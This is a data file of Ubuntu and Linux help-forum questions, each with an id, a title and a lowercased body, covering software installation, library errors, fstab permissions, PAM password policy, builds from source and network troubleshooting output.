164283	how can i install mythtv 0.24 on ubuntu 12.04 ?	i am trying to figure out the easy way to install mythtv 0.24 on ubuntu 12.04 . i want to use xbmc as front end and mythtv 0.25 it will not work right ?
164284	how do have icons in a listview on desktop	for windows user 's there is a tweak to make your desktop icons in a list view as you can see here : http : //www.howtogeek.com/ ? post_type=post & p=959 icons normally on desktop : icons in a listview : i 've managed to have icons in a listview on macbook as well , which has this option as in-built functionality . how can i achieve the same functionality on ubuntu ( unity ) ?
164286	quickly : share , release and submitubuntu not working anymore	i have the problem that after applying the changes suggested from the arb ( modifying some debian/* and such files ) the commands quickly { share , release , submitubuntu } oddly stopped working for me . however , quickly { package , run } still works just fine . you can find my program with the latest source code here : https : //launchpad.net/uberwriter wolf @ wolf-laptop : ~/programme/uberwriter $ quickly release get launchpad settings launchpad connection is ok ... ... ... ... an error has occurred when creating debian packaging error : ca n't create or update ubuntu package error : release command failed aborting i would be really happy about any suggestions how to fix that , because i really liked the quickly workflow , which was ( up to now ) incredible painless . -wolfv
164289	how to play a song on mplayer on repeat ?	i usually play songs on mplayer through terminal . however , i do n't know to put a song on repeat - as i want to listen to a particular song again and again . how to put a single song/set of songs on repeat ?
164292	having an issue in restricting length of password	i am trying to place a restriction on my ssh box to require a password of a min . length of 16 character and a max . of 30 . i was following the password policy section , in the official user documentation and set the following in /etc/pam.d/common-password : password [ success=1 default=ignore ] pam_unix.so obscure min=16 max=30 sha512 however when i turn on ssh , as a regular user , and go to change my password via passwd , i am restricted to a minimum of only 8 characters . would anyone have any ideas as to why the min . of 16 is not being recognised or it was something i have overlooked ? os is ubuntu server 10.04 .
164293	how to install flex ?	i tried sudo yum install flex but i just get : no package flex available . i 'm trying to install this for a dependency for yara 1.6 in order to install jsunpack . thank you for the help .
164294	problem with terminal while creating a bootable usb stick on os x	i 'm following the instructions to create a bootable usb stick on os x and everything is fine until step number 8 : i have executed sudo , entered my password and now nothing is happening . i tried to go to step number 9 and ejected the usb stick and nothing happened . so i took it out manually and then the terminal reacted saying that it could not find the device . i tried to see if my usb stick worked on my asus eee pc ( where i want to install ubuntu ) and of course it did n't . so i started the whole procedure again and do n't know what i should do after entering my password - i am not getting any error message .
164296	glibcxx_3.4.15 not found	when i try to run blender builds from graphicall.org ( 11.04 natty 64-bit ) , i get the following message : ./blender : /usr/lib/x86_64-linux-gnu/libstdc++.so.6 : version 'glibcxx_3.4.15 ' not found ( required by ./blender ) i have tried updating gcc and g++ , but it still gives the error , and when i run strings /usr/lib/x86_64-linux-gnu/libstdc++.so.6 | grep glibc , i get glibcxx_3.4 glibcxx_3.4.1 glibcxx_3.4.2 glibcxx_3.4.3 glibcxx_3.4.4 glibcxx_3.4.5 glibcxx_3.4.6 glibcxx_3.4.7 glibcxx_3.4.8 glibcxx_3.4.9 glibcxx_3.4.10 glibcxx_3.4.11 glibcxx_3.4.12 glibcxx_3.4.13 glibcxx_3.4.14 glibc_2.2.5 glibc_2.3 glibc_2.4 glibc_2.3.4 glibc_2.3.2 glibcxx_force_new glibcxx_debug_message_length are there any other libraries needed to get glib 3.4.15 on 11.04 , or any other workarounds ? thanks , anthonyp edit : i do n't know if it makes a difference , but i 'm on a wubi install . edit : ldd ./blender gives ./blender : /usr/lib/x86_64-linux-gnu/libstdc++.so.6 : version `glibcxx_3.4.15 ' not found ( required by ./blender ) < br > linux-vdso.so.1 = > ( 0x00007fffce5ff000 ) < br > libfreetype.so.6 = > /usr/lib/x86_64-linux-gnu/libfreetype.so.6 ( 0x00007f773ec3d000 ) < br > libpython3.2mu.so.1.0 = > /usr/lib/libpython3.2mu.so.1.0 ( 0x00007f773e6cc000 ) < br > libopenal.so.1 = > /usr/lib/libopenal.so.1 ( 0x00007f773e473000 ) < br > libgomp.so.1 = > /usr/lib/x86_64-linux-gnu/libgomp.so.1 ( 0x00007f773e265000 ) < br > libtiff.so.4 = > /usr/lib/x86_64-linux-gnu/libtiff.so.4 ( 0x00007f773e002000 ) < br > libz.so.1 = > /lib/x86_64-linux-gnu/libz.so.1 ( 0x00007f773dde9000 ) < br > libsndfile.so.1 = > /usr/lib/libsndfile.so.1 ( 0x00007f773db81000 ) < br > libfftw3.so.3 = > /usr/lib/libfftw3.so.3 ( 0x00007f773d886000 ) < br > libsdl-1.2.so.0 = > /usr/lib/libsdl-1.2.so.0 ( 0x00007f773d5ef000 ) < br > libgl.so.1 = > /usr/lib/mesa/libgl.so.1 ( 0x00007f773d372000 ) < br > libglu.so.1 = > /usr/lib/libglu.so.1 ( 0x00007f773d103000 ) < br > libx11.so.6 = > /usr/lib/x86_64-linux-gnu/libx11.so.6 ( 0x00007f773cdc8000 ) < br > libxi.so.6 = > /usr/lib/x86_64-linux-gnu/libxi.so.6 ( 0x00007f773cbb8000 ) < br > libjpeg.so.62 = > /usr/lib/x86_64-linux-gnu/libjpeg.so.62 ( 0x00007f773c994000 ) < br > libpng12.so.0 = > /lib/x86_64-linux-gnu/libpng12.so.0 ( 0x00007f773c76c000 ) < br > libc.so.6 = > /lib/x86_64-linux-gnu/libc.so.6 ( 0x00007f773c3d7000 ) < br > libm.so.6 = > /lib/x86_64-linux-gnu/libm.so.6 ( 0x00007f773c152000 ) < br > libdl.so.2 = > /lib/x86_64-linux-gnu/libdl.so.2 ( 0x00007f773bf4d000 ) < br > libpthread.so.0 = > /lib/x86_64-linux-gnu/libpthread.so.0 ( 0x00007f773bd2f000 ) < br > libstdc++.so.6 = > /usr/lib/x86_64-linux-gnu/libstdc++.so.6 ( 0x00007f773ba29000 ) < br > libgcc_s.so.1 = > /lib/x86_64-linux-gnu/libgcc_s.so.1 ( 0x00007f773b812000 ) < br > libssl.so.0.9.8 = > /lib/libssl.so.0.9.8 ( 0x00007f773b5bf000 ) < br > libcrypto.so.0.9.8 = > /lib/libcrypto.so.0.9.8 ( 0x00007f773b230000 ) < br > libffi.so.5 = > /usr/lib/libffi.so.5 ( 0x00007f773b027000 ) < br > libexpat.so.1 = > /lib/x86_64-linux-gnu/libexpat.so.1 ( 0x00007f773adfd000 ) < br > libutil.so.1 = > /lib/x86_64-linux-gnu/libutil.so.1 ( 0x00007f773abfa000 ) < br > librt.so.1 = > /lib/x86_64-linux-gnu/librt.so.1 ( 0x00007f773a9f1000 ) < br > libflac.so.8 = > /usr/lib/libflac.so.8 ( 0x00007f773a7a7000 ) < br > libvorbisenc.so.2 = > /usr/lib/libvorbisenc.so.2 ( 0x00007f773a2d8000 ) < br > libvorbis.so.0 = > /usr/lib/libvorbis.so.0 ( 0x00007f773a0ab000 ) < br > libogg.so.0 = > /usr/lib/libogg.so.0 ( 0x00007f7739ea4000 ) < br > libpulse-simple.so.0 = > /usr/lib/libpulse-simple.so.0 ( 0x00007f7739ca0000 ) < br > libpulse.so.0 = > /usr/lib/libpulse.so.0 ( 0x00007f7739a5e000 ) < br > libxext.so.6 = > /usr/lib/x86_64-linux-gnu/libxext.so.6 ( 0x00007f773984c000 ) < br > libxdamage.so.1 = > /usr/lib/x86_64-linux-gnu/libxdamage.so.1 ( 0x00007f7739649000 ) < br > libxfixes.so.3 = > /usr/lib/x86_64-linux-gnu/libxfixes.so.3 ( 0x00007f7739442000 ) < br > libxxf86vm.so.1 = > /usr/lib/x86_64-linux-gnu/libxxf86vm.so.1 ( 0x00007f773923c000 ) < br > libdrm.so.2 = > /lib/x86_64-linux-gnu/libdrm.so.2 ( 0x00007f7739031000 ) < br > /lib64/ld-linux-x86-64.so.2 ( 0x00007f773eefe000 ) < br > libxcb.so.1 = > /usr/lib/x86_64-linux-gnu/libxcb.so.1 ( 0x00007f7738e14000 ) < br > libpulsecommon-0.9.22.so = > /usr/lib/libpulsecommon-0.9.22.so ( 0x00007f7738bc8000 ) < br > libx11-xcb.so.1 = > /usr/lib/x86_64-linux-gnu/libx11-xcb.so.1 ( 0x00007f77389c5000 ) < br > libice.so.6 = > /usr/lib/x86_64-linux-gnu/libice.so.6 ( 0x00007f77387aa000 ) < br > libsm.so.6 = > /usr/lib/x86_64-linux-gnu/libsm.so.6 ( 0x00007f77385a2000 ) < br > libxtst.so.6 = > /usr/lib/libxtst.so.6 ( 0x00007f773839b000 ) < br > libxcb-atom.so.1 = > /usr/lib/libxcb-atom.so.1 ( 0x00007f7738196000 ) < br > libdbus-1.so.3 = > /lib/x86_64-linux-gnu/libdbus-1.so.3 ( 0x00007f7737f52000 ) < br > libxau.so.6 = > /usr/lib/x86_64-linux-gnu/libxau.so.6 ( 0x00007f7737d4e000 ) < br > libxdmcp.so.6 = > /usr/lib/x86_64-linux-gnu/libxdmcp.so.6 ( 0x00007f7737b48000 ) < br > libwrap.so.0 = > /lib/libwrap.so.0 ( 0x00007f773793d000 ) < br > libuuid.so.1 = > /lib/x86_64-linux-gnu/libuuid.so.1 ( 0x00007f7737737000 ) < br > libnsl.so.1 = > /lib/x86_64-linux-gnu/libnsl.so.1 ( 0x00007f773751d000 ) < br >
164300	installing ubuntu without a disk , using an external hard drive	the computer i have does n't have a cd burner , but i do have an external hard drive . i ca n't upgrade to the new ubuntu . i got the older version off an old cd , have a player not a burner , so i downloaded the newest version of ubuntu . it wo n't automatically run the program and the websites say i need to burn something to make it run . what do i do ? if anyone knows , please let me know .
164302	how do i delete files in /usr ?	i have filled my disk but can see games in /usr that i could delete but ca n't see how to do it . i am not a computer buff and have no idea what a terminal is .
164307	search and replace within files	i found the following awesome little script at link $ find /home/bruno/old-friends -type f -exec sed -i 's/ugly/beautiful/g ' { } \ ; but i really do not understand the final bit { } \ ; could someone please explain ? ? thanks !
164315	added new partition to system , `` permission denied '' when running programs	i reformatted a ntfs partition on my system with ext4 because i want to use it on my current ubuntu installation , not on windows . i added an entry to /etc/fstab to mount it at start-up . the mount point is /home/username/bin . i changed the owner of /home/username/bin and all of its sub-directories to my regular account and its user group . finally , i set all permissions to 755 . my /etc/fstab looks as follows : proc /proc proc nodev , noexec , nosuid 0 0 uuid= [ uuid ] / ext4 errors=remount-ro 0 1 uuid= [ uuid ] /data vfat utf8 , umask=007 , gid=46 0 1 uuid= [ uuid ] /home ext4 defaults 0 2 uuid= [ uuid ] /home/username/bin ext4 rw , suid , dev , exec , auto , user , async 0 2 uuid= [ uuid ] none swap sw 0 0 my problem is now that while i 'm able to read and write files on this new partition , i can not run applications/programs located there . as a regular user , i always get a `` permission denied '' error . as root ( with sudo ) , just nothing happens , which means it immediately puts me back to the shell prompt . the applications should produce textual output or open windows . some of these applications are binaries , some are scripts . i try to launch them with ./program . if i copy them back to my home folder , i can run them without problems . actually , i kept these applications for months in another sub-directory /home/username/apps of my home folder and ran them from there , without any problems . how can i fix this ? what am i doing wrong ? : )
164318	problem with wired internet connecting on mtnl triband	i am a ubuntu user from mumbai , india and subscribe to mtnl 's triband broadband service . i have a dual boot system with windows 7 and ubuntu 12.04 installed . i am getting good internet connectivity when working on windows 7 but on ubuntu , even though the 'up and down arrow ' denoting a working ethernet connection is seen in the menu , i am unable to access any of the websites or perform any ubuntu updates using the terminal . in windows , connection is automatic without requiring any username or password . based on some searching that i did here , i found a few commands whose output helps identify the problem . i am posting the output of three of those in the following lines : - 1 ) lshw pratik @ eureka : ~ $ sudo lshw eureka description : computer width : 64 bits capabilities : vsyscall32 *-core description : motherboard physical id : 0 *-memory description : system memory physical id : 0 size : 1874mib *-cpu product : amd athlon ( tm ) ii x3 440 processor vendor : hynix semiconductor ( hyundai electronics ) physical id : 1 bus info : cpu @ 0 size : 800mhz capacity : 800mhz width : 64 bits capabilities : fpu fpu_exception wp vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 ht syscall nx mmxext fxsr_opt pdpe1gb rdtscp x86-64 3dnowext 3dnow constant_tsc rep_good nopl nonstop_tsc extd_apicid pni monitor cx16 popcnt lahf_lm cmp_legacy svm extapic cr8_legacy abm sse4a misalignsse 3dnowprefetch osvw ibs skinit wdt npt lbrv svm_lock nrip_save cpufreq *-pci:0 description : host bridge product : rs690 host bridge vendor : hynix semiconductor ( hyundai electronics ) physical id : 100 bus info : pci @ 0000:00:00.0 version : 00 width : 32 bits clock : 66mhz configuration : latency=32 *-pci:0 description : pci bridge product : rs690 pci to pci bridge ( internal gfx ) vendor : hynix semiconductor ( hyundai electronics ) physical id : 1 bus info : pci @ 0000:00:01.0 version : 00 width : 32 bits clock : 66mhz capabilities : pci normal_decode bus_master cap_list resources : ioport : e000 ( size=4096 ) memory : fde00000-fdffffff ioport : d8000000 ( size=134217728 ) *-display description : vga compatible controller product : radeon 2100 vendor : hynix semiconductor ( hyundai electronics ) physical id : 5 bus info : pci @ 0000:01:05.0 version : 00 width : 64 bits clock : 33mhz capabilities : vga_controller bus_master cap_list rom configuration : driver=radeon latency=32 resources : irq:18 memory : d8000000-dfffffff memory : fdff0000-fdffffff ioport : ee00 ( size=256 ) memory : fde00000-fdefffff *-pci:1 description : pci bridge product : rs690 pci to pci bridge ( pci express port 2 ) vendor : hynix semiconductor ( hyundai electronics ) physical id : 6 bus info : pci @ 0000:00:06.0 version : 00 width : 32 bits clock : 33mhz capabilities : pci normal_decode bus_master cap_list configuration : driver=pcieport resources : irq:40 ioport : d000 ( size=4096 ) memory : fdd00000-fddfffff ioport : fda00000 ( size=1048576 ) *-network description : ethernet interface product : rtl8111/8168b pci express gigabit ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:02:00.0 logical name : eth0 version : 03 serial : 6c : f0:49 : dd:10:69 size : 100mbit/s capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : bus_master cap_list rom ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=full firmware=rtl_nic/rtl8168d-2.fw ip=192.168.1.33 latency=0 multicast=yes port=mii speed=100mbit/s resources : irq:41 ioport : de00 ( size=256 ) memory : fdaff000-fdafffff memory : fdaf8000-fdafbfff memory : fda00000-fda1ffff *-storage description : sata controller product : sb7x0/sb8x0/sb9x0 sata controller [ ide mode ] vendor : hynix semiconductor ( hyundai electronics ) physical id : 11 bus info : pci @ 0000:00:11.0 logical name : scsi1 version : 00 width : 32 bits clock : 66mhz capabilities : storage ahci_1.0 bus_master cap_list emulated configuration : driver=ahci latency=32 resources : irq:22 ioport : ff00 ( size=8 ) ioport : fe00 ( size=4 ) ioport : fd00 ( size=8 ) ioport : fc00 ( size=4 ) ioport : fb00 ( size=16 ) memory : fe02f000-fe02f3ff *-cdrom description : dvd-ram writer product : baer dh-24aas vendor : moser physical id : 0.0.0 bus info : scsi @ 1:0.0.0 logical name : /dev/cdrom logical name : /dev/cdrw logical name : /dev/dvd logical name : /dev/dvdrw logical name : /dev/sr0 version : bm7z capabilities : removable audio cd-r cd-rw dvd dvd-r dvd-ram configuration : ansiversion=5 status=nodisc *-usb:0 description : usb controller product : sb7x0/sb8x0/sb9x0 usb ohci0 controller vendor : hynix semiconductor ( hyundai electronics ) physical id : 12 bus info : pci @ 0000:00:12.0 version : 00 width : 32 bits clock : 66mhz capabilities : ohci bus_master configuration : driver=ohci_hcd latency=32 resources : irq:16 memory : fe02e000-fe02efff *-usb:1 description : usb controller product : sb7x0 usb ohci1 controller vendor : hynix semiconductor ( hyundai electronics ) physical id : 12.1 bus info : pci @ 0000:00:12.1 version : 00 width : 32 bits clock : 66mhz capabilities : ohci bus_master configuration : driver=ohci_hcd latency=32 resources : irq:16 memory : fe02d000-fe02dfff *-usb:2 description : usb controller product : sb7x0/sb8x0/sb9x0 usb ehci controller vendor : hynix semiconductor ( hyundai electronics ) physical id : 12.2 bus info : pci @ 0000:00:12.2 version : 00 width : 32 bits clock : 66mhz capabilities : ehci bus_master cap_list configuration : driver=ehci_hcd latency=32 resources : irq:17 memory : fe02c000-fe02c0ff *-usb:3 description : usb controller product : sb7x0/sb8x0/sb9x0 usb ohci0 controller vendor : hynix semiconductor ( hyundai electronics ) physical id : 13 bus info : pci @ 0000:00:13.0 version : 00 width : 32 bits clock : 66mhz capabilities : ohci bus_master configuration : driver=ohci_hcd latency=32 resources : irq:18 memory : fe02b000-fe02bfff *-usb:4 description : usb controller product : sb7x0 usb ohci1 controller vendor : hynix semiconductor ( hyundai electronics ) physical id : 13.1 bus info : pci @ 0000:00:13.1 version : 00 width : 32 bits clock : 66mhz capabilities : ohci bus_master configuration : driver=ohci_hcd latency=32 resources : irq:18 memory : fe02a000-fe02afff *-usb:5 description : usb controller product : sb7x0/sb8x0/sb9x0 usb ehci controller vendor : hynix semiconductor ( hyundai electronics ) physical id : 13.2 bus info : pci @ 0000:00:13.2 version : 00 width : 32 bits clock : 66mhz capabilities : ehci bus_master cap_list configuration : driver=ehci_hcd latency=32 resources : irq:19 memory : fe029000-fe0290ff *-serial description : smbus product : sbx00 smbus controller vendor : hynix semiconductor ( hyundai electronics ) physical id : 14 bus info : pci @ 0000:00:14.0 version : 3c width : 32 bits clock : 66mhz capabilities : cap_list configuration : driver=piix4_smbus latency=0 resources : irq:0 *-ide description : ide interface product : sb7x0/sb8x0/sb9x0 ide controller vendor : hynix semiconductor ( hyundai electronics ) physical id : 14.1 bus info : pci @ 0000:00:14.1 version : 00 width : 32 bits clock : 66mhz capabilities : ide bus_master cap_list configuration : driver=pata_atiixp latency=32 resources : irq:16 ioport:1f0 ( size=8 ) ioport:3f6 ioport:170 ( size=8 ) ioport:376 ioport : fa00 ( size=16 ) *-multimedia description : audio device product : sbx00 azalia ( intel hda ) vendor : hynix semiconductor ( hyundai electronics ) physical id : 14.2 bus info : pci @ 0000:00:14.2 version : 00 width : 64 bits clock : 33mhz capabilities : bus_master cap_list configuration : driver=snd_hda_intel latency=32 resources : irq:16 memory : fe024000-fe027fff *-isa description : isa bridge product : sb7x0/sb8x0/sb9x0 lpc host controller vendor : hynix semiconductor ( hyundai electronics ) physical id : 14.3 bus info : pci @ 0000:00:14.3 version : 00 width : 32 bits clock : 66mhz capabilities : isa bus_master configuration : latency=0 *-pci:2 description : pci bridge product : sbx00 pci to pci bridge vendor : hynix semiconductor ( hyundai electronics ) physical id : 14.4 bus info : pci @ 0000:00:14.4 version : 00 width : 32 bits clock : 66mhz capabilities : pci subtractive_decode bus_master vga_palette resources : ioport : c000 ( size=4096 ) memory : fdc00000-fdcfffff memory : fdb00000-fdbfffff *-usb:6 description : usb controller product : sb7x0/sb8x0/sb9x0 usb ohci2 controller vendor : hynix semiconductor ( hyundai electronics ) physical id : 14.5 bus info : pci @ 0000:00:14.5 version : 00 width : 32 bits clock : 66mhz capabilities : ohci bus_master configuration : driver=ohci_hcd latency=32 resources : irq:18 memory : fe028000-fe028fff *-pci:1 description : host bridge product : family 10h processor hypertransport configuration vendor : hynix semiconductor ( hyundai electronics ) physical id : 101 bus info : pci @ 0000:00:18.0 version : 00 width : 32 bits clock : 33mhz *-pci:2 description : host bridge product : family 10h processor address map vendor : hynix semiconductor ( hyundai electronics ) physical id : 102 bus info : pci @ 0000:00:18.1 version : 00 width : 32 bits clock : 33mhz *-pci:3 description : host bridge product : family 10h processor dram controller vendor : hynix semiconductor ( hyundai electronics ) physical id : 103 bus info : pci @ 0000:00:18.2 version : 00 width : 32 bits clock : 33mhz *-pci:4 description : host bridge product : family 10h processor miscellaneous control vendor : hynix semiconductor ( hyundai electronics ) physical id : 104 bus info : pci @ 0000:00:18.3 version : 00 width : 32 bits clock : 33mhz configuration : driver=k10temp resources : irq:0 *-pci:5 description : host bridge product : family 10h processor link control vendor : hynix semiconductor ( hyundai electronics ) physical id : 105 bus info : pci @ 0000:00:18.4 version : 00 width : 32 bits clock : 33mhz *-scsi physical id : 1 bus info : scsi @ 4 logical name : scsi4 capabilities : scsi-host configuration : driver=usb-storage 2 ) lspci pratik @ eureka : ~ $ lspci 00:00.0 host bridge : advanced micro devices [ amd ] nee ati rs690 host bridge 00:01.0 pci bridge : advanced micro devices [ amd ] nee ati rs690 pci to pci bridge ( internal gfx ) 00:06.0 pci bridge : advanced micro devices [ amd ] nee ati rs690 pci to pci bridge ( pci express port 2 ) 00:11.0 sata controller : advanced micro devices [ amd ] nee ati sb7x0/sb8x0/sb9x0 sata controller [ ide mode ] 00:12.0 usb controller : advanced micro devices [ amd ] nee ati sb7x0/sb8x0/sb9x0 usb ohci0 controller 00:12.1 usb controller : advanced micro devices [ amd ] nee ati sb7x0 usb ohci1 controller 00:12.2 usb controller : advanced micro devices [ amd ] nee ati sb7x0/sb8x0/sb9x0 usb ehci controller 00:13.0 usb controller : advanced micro devices [ amd ] nee ati sb7x0/sb8x0/sb9x0 usb ohci0 controller 00:13.1 usb controller : advanced micro devices [ amd ] nee ati sb7x0 usb ohci1 controller 00:13.2 usb controller : advanced micro devices [ amd ] nee ati sb7x0/sb8x0/sb9x0 usb ehci controller 00:14.0 smbus : advanced micro devices [ amd ] nee ati sbx00 smbus controller ( rev 3c ) 00:14.1 ide interface : advanced micro devices [ amd ] nee ati sb7x0/sb8x0/sb9x0 ide controller 00:14.2 audio device : advanced micro devices [ amd ] nee ati sbx00 azalia ( intel hda ) 00:14.3 isa bridge : advanced micro devices [ amd ] nee ati sb7x0/sb8x0/sb9x0 lpc host controller 00:14.4 pci bridge : advanced micro devices [ amd ] nee ati sbx00 pci to pci bridge 00:14.5 usb controller : advanced micro devices [ amd ] nee ati sb7x0/sb8x0/sb9x0 usb ohci2 controller 00:18.0 host bridge : advanced micro devices [ amd ] family 10h processor hypertransport configuration 00:18.1 host bridge : advanced micro devices [ amd ] family 10h processor address map 00:18.2 host bridge : advanced micro devices [ amd ] family 10h processor dram controller 00:18.3 host bridge : advanced micro devices [ amd ] family 10h processor miscellaneous control 00:18.4 host bridge : advanced micro devices [ amd ] family 10h processor link control 01:05.0 vga compatible controller : advanced micro devices [ amd ] nee ati radeon 2100 02:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168b pci express gigabit ethernet controller ( rev 03 ) 3 ) ifconfig eth0 pratik @ eureka : ~ $ ifconfig eth0 : eth0 : link encap : ethernet hwaddr 6c : f0:49 : dd:10:69 up broadcast running multicast mtu:1500 metric:1 interrupt:41 i hope this is not a repost of a question already posted on this forum . if it is , i apologize for the same . please let me know if any more information is required . thanks !
164322	how to build gettext from source ?	i am attempting to build gettext 0.18.1.1 from the source under ubuntu 12.04 . i need to understand how to build it from the source because i am attempting to port it to another platform . i checked out version 0.18.1.1 from git : //git.savannah.gnu.org/gettext.git , installed the dependencies mentioned in autogen.sh and attempted to build . here is the output i get for autogen.sh : http : //pastebin.com/ai49ixa6 ( stackoverflow wo n't let me embed this much text inline ) there are plenty of warnings but ( seemingly ) no fatal errors . i proceed with configure : checking for a bsd-compatible install ... /usr/bin/install -c checking whether build environment is sane ... yes checking for a thread-safe mkdir -p ... /bin/mkdir -p checking for gawk ... no checking for mawk ... mawk checking whether make sets $ ( make ) ... yes checking whether make supports nested variables ... yes checking build system type ... x86_64-unknown-linux-gnu checking host system type ... x86_64-unknown-linux-gnu configure : creating ./config.status config.status : creating makefile config.status : creating gnulib-local/makefile === configuring in gettext-runtime ( /home/gili/desktop/gettext/gettext-runtime ) configure : running /bin/bash ./configure -- disable-option-checking ' -- prefix=/usr/local ' -- cache-file=/dev/null -- srcdir= . checking for a bsd-compatible install ... /usr/bin/install -c checking whether build environment is sane ... yes checking for a thread-safe mkdir -p ... /bin/mkdir -p checking for gawk ... no checking for mawk ... mawk checking whether make sets $ ( make ) ... yes checking whether make supports nested variables ... yes checking for gcc ... gcc checking for c compiler default output file name ... a.out checking whether the c compiler works ... yes checking whether we are cross compiling ... no checking for suffix of executables ... checking for suffix of object files ... o checking whether we are using the gnu c compiler ... yes checking whether gcc accepts -g ... yes checking for gcc option to accept iso c89 ... none needed checking for style of include used by make ... gnu checking dependency style of gcc ... none checking for bison ... bison -y ./configure : line 4199 : gt_java_choice : command not found ./configure : line 4201 : syntax error near unexpected token `1.3 , ' ./configure : line 4201 : `gt_javacomp ( 1.3 , 1.1 ) ' configure : error : ./configure failed for gettext-runtime i am using autoconf 2.64 and automake 1.11.3 . any ideas ? update : i can build from tarball , but not from the repository . i ca n't figure out how the tarball was generated .
164330	failed to load module fglrx ( module does not exist 0 ) on backtrack 5	i have uninstalled fglrx modules and ati modules in order to re-install them.after the rebooting the i cant come up with gui ... . on startx it displays failed to load module fglrx ( module does not exist 0 ) no drivers available ddxsiggiveup : closing log giving up xinit : no such file or directory ( errno 2 ) .unable to connect to xserver xinit : no such process ( errno 3 ) : server error
164340	i am experiencing slow performance on my system . how do i diagnose and fix it ?	i am using ubuntu 12.04 in my laptop . this is my first experience in ubuntu . i just installed ubuntu yesterday . i have dual os in my laptop . the other os is windows 7 . comparing windows 7 ubuntu performance is very slow for me . for example to open the dash it takes 10 seconds . what could cause this to happen ? my hardware : intel dual core . 2 gb ram . 320 gb hard disk basically ubuntu is slow or for me only . i have a good opinion of windows comparing window after using ubuntu 12.04 .
164341	path missing when use as root	i 'm running jsunpack.py , after installing all dependencies and setting the correct path , i decided to test it . i run it as python jsunpack.py test.htm and it works fine , now when i try to sudo it i get : error : error : fatal error in decodejs : [ errno 2 ] no such file or directory ( probably you are missing `` js '' in your path ) which leads me to think i do n't have the path set up in root . so i sudo su root and i echo the path only to see that it is indeed there . i 'm thoroughly confused , does it have something to do with permissions ?
164342	internet connection not working although it says it is connected	i have a toshiba z830 with ubuntu 12.04 . i could use without problems the dsl connection ( i have no router , only a modem ) at home until a couple of days ago : it stopped to work when while connected with the dsl connection via ciscovpn ( to my workplace ) , i had to leave the laptop unattended for a while and i guess the laptop tried to go to suspend . when i came back there were many messages on a black screen ( sorry , i can not attach an image because of my low reputation ) and the laptop was not responding . i had to reset the it . after rebooting it , the internet connection did n't work as did before ( no browsing , no ssh , no skype , etc ) although it says it is connected . i only can browse , etc when i connect to ciscovpn to the same place where i was connected when it crashed . when i am physically where i connected via vpn ( at work ) i can use the wireless , which i am not able to use now anymore since the incident described above . some additional information : martillu @ ubuntu : ~ $ cat /etc/resolv.conf domain km.icrr.u-tokyo.ac.jp nameserver 10.240.12.134 nameserver 10.240.12.135 martillu @ ubuntu : ~ $ route -n kernel ip routing table destination gateway genmask flags metric ref use iface 0.0.0.0 61.127.116.199 0.0.0.0 ug 0 0 0 ppp0 61.127.116.199 0.0.0.0 255.255.255.255 uh 0 0 0 ppp0 169.254.0.0 0.0.0.0 255.255.0.0 u 1000 0 0 ppp0 martillu @ ubuntu : ~ $ ifconfig eth0 link encap : ethernet hwaddr e8 : e0 : b7:2f : bc:5a inet6 addr : fe80 : :eae0 : b7ff : fe2f : bc5a/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:17620 errors:0 dropped:1 overruns:0 frame:0 tx packets:13168 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:19452232 ( 19.4 mb ) tx bytes:2568218 ( 2.5 mb ) interrupt:20 memory : c0700000-c0720000 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:134 errors:0 dropped:0 overruns:0 frame:0 tx packets:134 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:36316 ( 36.3 kb ) tx bytes:36316 ( 36.3 kb ) ppp0 link encapoint-to-point protocol inet addr:219.167.252.226 p-t-p:61.127.116.199 mask:255.255.255.255 up pointopoint running noarp multicast mtu:1454 metric:1 rx packets:17608 errors:0 dropped:0 overruns:0 frame:0 tx packets:13129 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:3 rx bytes:18993590 ( 18.9 mb ) tx bytes:2221195 ( 2.2 mb ) wlan0 link encap : ethernet hwaddr 9c : b7:0d : d9:21 : f3 up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) i think that : domain km.icrr.u-tokyo.ac.jp in the resolv.conf may be suspicious , since if i am not connected via ciscovpn i do not know why it should appear `` km.icrr.u-tokyo.ac.jp '' ( this is where i connect via vpn ) please , help .
164345	tracking weird root tty behavior	i randomly ran the finger command on my machine and these two lines came up in addition to my own user ( the machine is fully mine ) : root root *pzďż˝ jul 5 15:25 ( :0.0 ) root root *^a jul 13 16:41 ( :0.0 ) does anyone know what this means ? how can i find out more about who is logged in as root and what they 're doing ? ( it could be me , but i ca n't recall running any sudo commands that did n't finish instantaneously ) . edit : thanks for taking a look at this . it turns out these are because of kvpnc - it creates one of these each time it 's launched .
164353	no bootable medium found system halted	when open ubuntu on virtual box , it does n't work , and the following message appear '' no bootable medium found system halted '' how i can solve this problm ? thanks
164356	ubuntu 's .iso is read as .rar on windows . should i install it on a usb drive assuming it 's an iso ?	i 'm trying to make an install with a usb drive with ubuntu-12.04-desktop-i386.iso . however , it is showing on windows vista 32bit as a winrar file . do i need to extract this using winrar , before i continue , or do i simply use the pendrive usb installer without extracting ?
164362	how to send to print ( many ) selected files in a directory instead of one by one ?	i 'm using ubuntu 12.04 and succesfully installed my wi-fi printer , but my question is : how to print many files at a time ? i mean , i have many pdf or text files in a folder and i want to send them directly to printer instead of opening one by one in file viewer and then to print and then repeat the whole process so many times / : i even see no print option when right clicking on the file or in the file menu . thank you !
